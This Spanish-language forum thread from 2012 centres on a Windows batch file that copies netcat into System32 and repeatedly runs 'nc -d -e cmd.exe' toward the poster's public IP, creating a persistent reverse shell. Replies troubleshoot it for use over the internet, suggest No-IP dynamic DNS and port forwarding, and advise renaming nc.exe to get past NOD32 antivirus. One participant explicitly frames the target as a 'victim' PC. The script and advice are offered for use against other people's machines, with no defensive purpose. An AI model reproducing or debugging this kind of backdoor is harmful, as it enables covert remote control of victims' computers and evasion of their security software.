Netcat: ayuda .bat que funciona como Shell inversa...

Iniciado por n0names, 12 Febrero 2012, 23:10 PM

0 Miembros y 1 Visitante están viendo este tema.

n0names

Codigo:
Código (dos) [Seleccionar]

@echo off
copy nc\generic.h c:\WINDOWS\system32\
copy nc\doexec.c c:\WINDOWS\system32\
copy nc\getopt.c c:\WINDOWS\system32\
copy nc\getopt.h c:\WINDOWS\system32\
copy nc\hobbit.txt c:\WINDOWS\system32\
copy nc\license.txt c:\WINDOWS\system32\
copy nc\hobbit.txt c:\WINDOWS\system32\
copy nc\makefile c:\WINDOWS\system32\
copy nc\nc.exe c:\WINDOWS\system32\
copy nc\netcat.c c:\WINDOWS\system32\
copy nc\readme.txt c:\WINDOWS\system32\
:svr
nc -d -e cmd.exe MI IP PUBLICA PUERTO>nul
ping -n  60 localhost>nul
goto svr


Que tal...

he creado este .bat que me funciona perfectamente a nivel de LAN usando la ip privada de red,  manipulando un puerto y accediendo con el netcat con

nc -vv -l -p 6000

cosa que ya deben de saber...

el .bat copia los archivos al system32 como verán y bueno todo bien hasta ahí, ahora el problema es que no esta funcionando la shell a nivel de internet, cambio la IP del .bat por mi ip publica pero aún así sigo sin conseguir respuesta de la shell...

podrían ayudarme a encontrar el problema?

gracias...

cristhiams

como t conectas a internet, con linea directa o router, mejor utiliza el NOIP

kub0x

Si utilizas tu máquina como servidor y pones Netcat a la escucha en el puerto 2345 (ejemplo) tendrás que abrir dicho puerto en el router, para que éste deje pasar todo el tráfico entrante y saliente por ese puerto que dejas a la escucha.

Como dijo cristhiams, utiliza una IP fija o estática, para que cuando cambie nuestra dirección IP por x motivo el cliente pueda seguir conectandose a nuestro servidor.
Para ello utiliza el programa NO-IP, totalmente gratuito y proporciona una IP fija en forma de DNS :P

Saludos.
Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate


n0names

ok ya cambie a no-ip, pero se que ocurrirá lo mismo ya que el no-ip es una "forma de ip publica estática", y aunque tenía una dinamica debia funcionar mientras esta no cambiara.

yo habilite en mi router el puerto al que quiero permitir acceso (por el cual quier ejecutar la conexion de la shell inversa) , y al que quiero conectar es simplemente un internet por linea directa...

alguna idea de por que no funciona amigos? he leido pero no encuentro mucha información acerca de esta shell y su  posible problema mediante internet, encuentro mucha información pero solo de LAN.

gracias por responder...

dont'Exist

Tal vez, estás poniendo mal alguno de los 2 códigos y la conexión no se está realizando.

Otra de las posibilidades es que el AV de la PC remota esté bloqueando la actividad de netcat. Si mal no recuerdo, creo que NOD32 solo bloqueaba a todo archivo que tenga el nombre y el tamaño del que tiene originalmente el archivo nc.exe, así que prueba cambiando el nombre del archivo. Aunque suene tonto me pasó. :P

Quizás algún firewall bloquee el intento de conexión o algún AV esté dando un falso positivo.

Una cosa más, no es necesario copiar todos los archivos a cierta ruta de la PC ya que solo sirve el archivo nc.exe, los restantes son sólo el código fuente.

Saludos.

vanchopper

Hola, disculpa mi intromisión , tu .bat solo funcionaria si primero logras meter en la pc victima el nc.exe , no ?

kub0x

Cita de: vanchopper en  8 Marzo 2012, 19:41 PM
Hola, disculpa mi intromisión , tu .bat solo funcionaria si primero logras meter en la pc victima el nc.exe , no ?

Exacto. Si la víctima no tuviera el nc.exe no podrías conectar con ella, ya que no usaria el mismo canal del NC. Por canal me refiero a socket o tubería :D

Saludos.
Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate